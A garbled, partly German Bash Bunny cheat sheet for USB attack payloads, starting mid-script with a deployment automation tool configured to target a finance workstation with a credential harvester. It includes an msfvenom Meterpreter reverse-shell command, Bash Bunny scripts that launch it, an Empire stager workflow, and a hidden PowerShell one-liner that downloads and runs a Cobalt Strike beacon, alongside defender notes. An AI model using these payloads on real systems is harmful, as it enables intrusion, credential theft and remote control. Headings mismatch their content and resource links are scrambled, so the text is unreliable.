
Bash Bunny Cheat Sheet

Translation: # Bash Bunny Spickzettel EOF

# Add deployment summaries
for deployment_file in "$RESULTS_DIR"/deployment_*.json; do
    if [ -f "$deployment_file" ]; then
        local payload_name=$(jq -r '.payload_name' "$deployment_file")
        local switch_pos=$(jq -r '.switch_position' "$deployment_file")
        local target=$(jq -r '.target_description' "$deployment_file")
        local deploy_time=$(jq -r '.deployment_time' "$deployment_file")

        cat >> "$report_file" << EOF
<div class="deployment success">
    <h3>Deployment: $payload_name</h3>
    <p><strong>Switch Position:</strong> $switch_pos</p>
    <p><strong>Target:</strong> $target</p>
    <p><strong>Deployment Time:</strong> $deploy_time</p>
</div>

EOF fi done

cat >> "$report_file" << 'EOF'
EOF
log_message "Deployment report generated: $report_file"

\\}

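# Function to clean up old results
#
# Deletes deployment records, collection directories and log files that
# `find -mtime +N` selects, i.e. entries whose age in whole 24-hour periods
# is greater than N.
# Globals:   RESULTS_DIR (read), LOG_FILE (read; only its directory is used)
# Arguments: $1 - retention period in days (optional, defaults to 30)
# Returns:   1 if the retention value is not a plain number or a required
#            global is unset; otherwise the status of the final log_message
cleanup_results() {
    local retention_days="${1:-30}"

    # The value is passed straight to `find -mtime`, so accept digits only.
    case "$retention_days" in
        *[!0-9]*)
            log_message "Invalid retention period: $retention_days"
            return 1
            ;;
    esac

    # An empty LOG_FILE would make dirname yield "." and the log cleanup would
    # then delete *.log files below the current directory instead.
    if [ -z "${RESULTS_DIR:-}" ] || [ -z "${LOG_FILE:-}" ]; then
        log_message "RESULTS_DIR and LOG_FILE must be set before cleanup"
        return 1
    fi

    log_message "Cleaning up results older than $retention_days days"

    # Clean up old deployment files
    find "$RESULTS_DIR" -name "deployment_*.json" -mtime "+$retention_days" -delete
    # -prune keeps find from descending into a directory that rm is removing
    find "$RESULTS_DIR" -name "collection_*" -type d -mtime "+$retention_days" \
        -prune -exec rm -rf -- {} +

    # Clean up old logs
    find "$(dirname -- "$LOG_FILE")" -name "*.log" -mtime "+$retention_days" -delete

    log_message "Cleanup completed"
}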

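# Main deployment workflow
#
# Loads a deployment configuration, then for switch positions 1 and 2 deploys
# the configured payload and, when AUTO_EXECUTE is "true", executes it and
# collects its results. Afterwards it generates the report and, when
# AUTO_CLEANUP is "true", prunes old results.
# Globals:   PAYLOAD_SWITCH_<n>, TARGET_SWITCH_<n>, TIMEOUT_SWITCH_<n>,
#            AUTO_EXECUTE, AUTO_CLEANUP, RETENTION_DAYS (read after the
#            configuration has been sourced)
# Arguments: $1 - path to the configuration file
# Returns:   1 if the configuration file does not exist; otherwise the status
#            of the final log_message
main_deployment() {
    local config_file="${1:-}"
    local i payload_var target_var timeout_var
    local payload_name target_desc timeout

    if [ ! -f "$config_file" ]; then
        log_message "Configuration file not found: $config_file"
        return 1
    fi

    log_message "Starting automated deployment workflow"

    # Read configuration
    # NOTE(security): `source` runs the file as shell code with this script's
    # privileges, so anyone who can write the file can run commands here.
    # Keep it owned by and writable only for the operator account.
    # shellcheck source=/dev/null
    source "$config_file"

    # Deploy payloads
    for i in 1 2; do
        payload_var="PAYLOAD_SWITCH_$i"
        target_var="TARGET_SWITCH_$i"
        timeout_var="TIMEOUT_SWITCH_$i"

        # Indirect expansion: read the variable whose name is stored in *_var;
        # a switch the configuration does not mention expands to empty.
        payload_name="${!payload_var:-}"
        target_desc="${!target_var:-}"
        timeout="${!timeout_var:-}"

        if [ -n "$payload_name" ]; then
            if deploy_payload "$payload_name" "$i" "$target_desc"; then
                # Wait for manual execution or auto-execute
                if [ "${AUTO_EXECUTE:-}" = "true" ]; then
                    sleep 5  # Allow time for deployment
                    execute_payload "$i" "$timeout"
                    collect_results "$i"
                fi
            fi
        fi
    done

    # Generate report
    generate_report

    # Cleanup if configured
    if [ "${AUTO_CLEANUP:-}" = "true" ]; then
        cleanup_results "${RETENTION_DAYS:-}"
    fi

    log_message "Automated deployment workflow completed"
}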

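# Create default configuration
#
# Writes a template deployment configuration to the path in DEPLOYMENT_CONFIG,
# replacing any existing file.
# Globals:   DEPLOYMENT_CONFIG (read)
# Returns:   1 if DEPLOYMENT_CONFIG is unset or the file cannot be written;
#            otherwise the status of the final log_message
create_default_config() {
    if [ -z "${DEPLOYMENT_CONFIG:-}" ]; then
        log_message "DEPLOYMENT_CONFIG is not set"
        return 1
    fi

    # The quoted delimiter keeps the template literal (no expansion).
    cat > "$DEPLOYMENT_CONFIG" << 'EOF' || { log_message "Could not write configuration: $DEPLOYMENT_CONFIG"; return 1; }
# Bash Bunny Deployment Configuration

# Payload assignments
PAYLOAD_SWITCH_1="credential_harvester"
PAYLOAD_SWITCH_2="network_recon"

# Target descriptions
TARGET_SWITCH_1="Windows 10 workstation - Finance department"
TARGET_SWITCH_2="Ubuntu server - Development environment"

# Execution timeouts (seconds)
TIMEOUT_SWITCH_1=300
TIMEOUT_SWITCH_2=600

# Automation settings
AUTO_EXECUTE=false
AUTO_CLEANUP=true
RETENTION_DAYS=30
EOF

    # The file holds target descriptions and is shell syntax that a workflow
    # may load with `source`; restrict it to the owning account.
    chmod 600 -- "$DEPLOYMENT_CONFIG"

    log_message "Default configuration created: $DEPLOYMENT_CONFIG"
}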

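# Command line interface
#
# Dispatches the first argument to the matching function and passes the
# remaining arguments through; anything else prints the usage text.
case "${1:-}" in
    "deploy")
        deploy_payload "$2" "$3" "$4"
        ;;
    "execute")
        execute_payload "$2" "$3"
        ;;
    "collect")
        collect_results "$2"
        ;;
    "report")
        generate_report
        ;;
    "cleanup")
        cleanup_results "$2"
        ;;
    "workflow")
        main_deployment "$2"
        ;;
    "config")
        create_default_config
        ;;
    *)
        # Argument placeholders mirror what each dispatch arm passes on.
        echo "Usage: $0 [command] [args]"
        echo "Commands:"
        echo "  deploy <payload> <switch> <target> - Deploy payload"
        echo "  execute <switch> [timeout] - Execute payload"
        echo "  collect <switch> - Collect results"
        echo "  report - Generate report"
        echo "  cleanup [days] - Clean up old results"
        echo "  workflow [config] - Run full workflow"
        echo "  config - Create default config"
        ;;
esac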


## Integration with Other Tools

### Metasploit Integration
```bash
# Generate Metasploit payloads for Bash Bunny
# Writes a Windows Meterpreter reverse-TCP executable into the switch1 payload
# directory. LHOST/LPORT are the listener address and port the executable
# connects back to; the address shown is a private-range example value.
# Defender note: stock msfvenom executables are widely signatured by AV/EDR,
# and a workstation opening an outbound session to an unexpected host on
# port 4444 (the Metasploit default) is a common network detection.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /root/udisk/payloads/switch1/payload.exe

# Bash Bunny payload to execute Metasploit payload
# The quoted heredoc delimiter writes the three payload lines verbatim.
# ATTACKMODE HID STORAGE makes the device present itself as a keyboard plus a
# mass-storage drive; the RUN line assumes that drive is mounted as E: on the
# host, which is not guaranteed.
# Defender note: USB device control (allow-listing by device class or ID) and
# blocking execution from removable media both address this vector.
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "E:\\payload.exe"
EOF

```

### Empire Integration

```bash

# Generate Empire stager for Bash Bunny
# The stager itself is produced inside the Empire console, not by this shell:
# In Empire console:
# (Empire) > usestager windows/launcher_bat
# (Empire: stager/windows/launcher_bat) > set Listener http
# (Empire: stager/windows/launcher_bat) > generate
# Defender note: a batch launcher that spawns PowerShell is typically visible
# in process-creation logging and in PowerShell script-block logging
# (Event ID 4104) on the target host.

# Copy generated stager to Bash Bunny storage
# Assumes empire_stager.bat is in the current directory.
cp empire_stager.bat /root/udisk/payloads/switch1/
```

### Cobalt Strike Integration
```bash
# Generate Cobalt Strike beacon for Bash Bunny
# The executable is built in the Cobalt Strike client, not by this shell:
# In Cobalt Strike:
# Attacks -> Packages -> Windows Executable (S)
# Save as beacon.exe

# Bash Bunny payload for Cobalt Strike
# The quoted heredoc delimiter writes the payload lines verbatim. The RUN line
# starts a hidden PowerShell that downloads beacon.exe over plain HTTP into
# C:\Windows\Temp and launches it; the address is a private-range example.
# Defender note: -WindowStyle Hidden, -ExecutionPolicy Bypass and
# Net.WebClient.DownloadFile on one command line are high-signal indicators in
# process-creation and script-block logs; the cleartext HTTP fetch is visible
# to proxies/IDS; and application control (AppLocker/WDAC) can block
# executables started from C:\Windows\Temp.
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& \\\\{(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.100/beacon.exe', 'C:\\Windows\\Temp\\beacon.exe'); Start-Process 'C:\\Windows\\Temp\\beacon.exe'\\\\}\""
EOF
```

## Fehlerbehebung
```bash
# Confirm the device enumerated: list USB devices and keep the Hak5 entries
lsusb | grep "Hak5"

# Re-enumerate root hub usb1 by de-authorizing and then re-authorizing it
# (this disconnects every device on that bus; needs root)
for authorized_state in 0 1; do
    echo "$authorized_state" > /sys/bus/usb/devices/usb1/authorized
done

# Show the 20 most recent kernel messages to look for USB errors
dmesg | tail -n 20
```

### Häufige Probleme
```bash
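# Check payload syntax (bash -n parses the file without executing it)
bash -n /root/udisk/payloads/switch1/payload.txt

# Make the payload file executable
chmod +x /root/udisk/payloads/switch1/payload.txt

# Test payload manually
# Run it only if the cd succeeded, so a payload.txt that happens to sit in
# the current directory is never executed by mistake.
cd /root/udisk/payloads/switch1/ && bash payload.txt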
```

#### Gerät nicht erkannt
```bash
# Exercise the LED by writing each command to the USB gadget serial device
for led_command in "LED SETUP" "LED FINISH"; do
    echo "$led_command" > /dev/ttyGS0
done

# Restart the service that drives the LED
systemctl restart led-controller
```

#### Payload wird nicht ausgeführt
```bash
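# Check storage image (file reports the detected image/filesystem type)
file /root/udisk/images/payload.img

# Mount storage image manually
mkdir -p /mnt/test
# List and unmount only when the loop mount succeeded; otherwise ls would show
# the empty mount point and umount would fail with a misleading error.
if mount -o loop /root/udisk/images/payload.img /mnt/test; then
    ls -la /mnt/test
    umount /mnt/test
fi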
```

#### LED funktioniert nicht
```bash
# Optimize payload execution speed
# Use DELAY sparingly
# Combine multiple STRING commands
# Use RUN for single commands

# Monitor system resources
# top is interactive (quit with q); free and df print one snapshot each of
# memory and filesystem usage in human-readable units.
top
free -h
df -h

# Clean up temporary files
# Each glob expands to every non-hidden entry in the directory, so this removes
# all of them, including files that running processes may still have open.
# NOTE(review): the /root/udisk paths elsewhere on this page suggest these
# commands are meant for the Bash Bunny's own shell; confirm which host the
# shell is on before running them.
rm -rf /tmp/*
rm -rf /var/tmp/*
```

#### Speichermodus-Probleme
https://docs.hak5.org/bash-bunny/##

# Leistungsoptimierung
https://forums.hak5.org/#

# Ressourcen
https://github.com/hak5/bashbunny-payloads- [Bash Bunny Offizielle Dokumentation](https://www.sans.org/white-papers/physical-penetration-testing/)https://www.nist.gov/publications/guidelines-media-sanitization- [Hak5 Community-Foren](https://github.com/trustedsec/social-engineer-toolkit)https://owasp.org/www-project-physical-security-testing-guide/- [Bash Bunny Payload-Repository](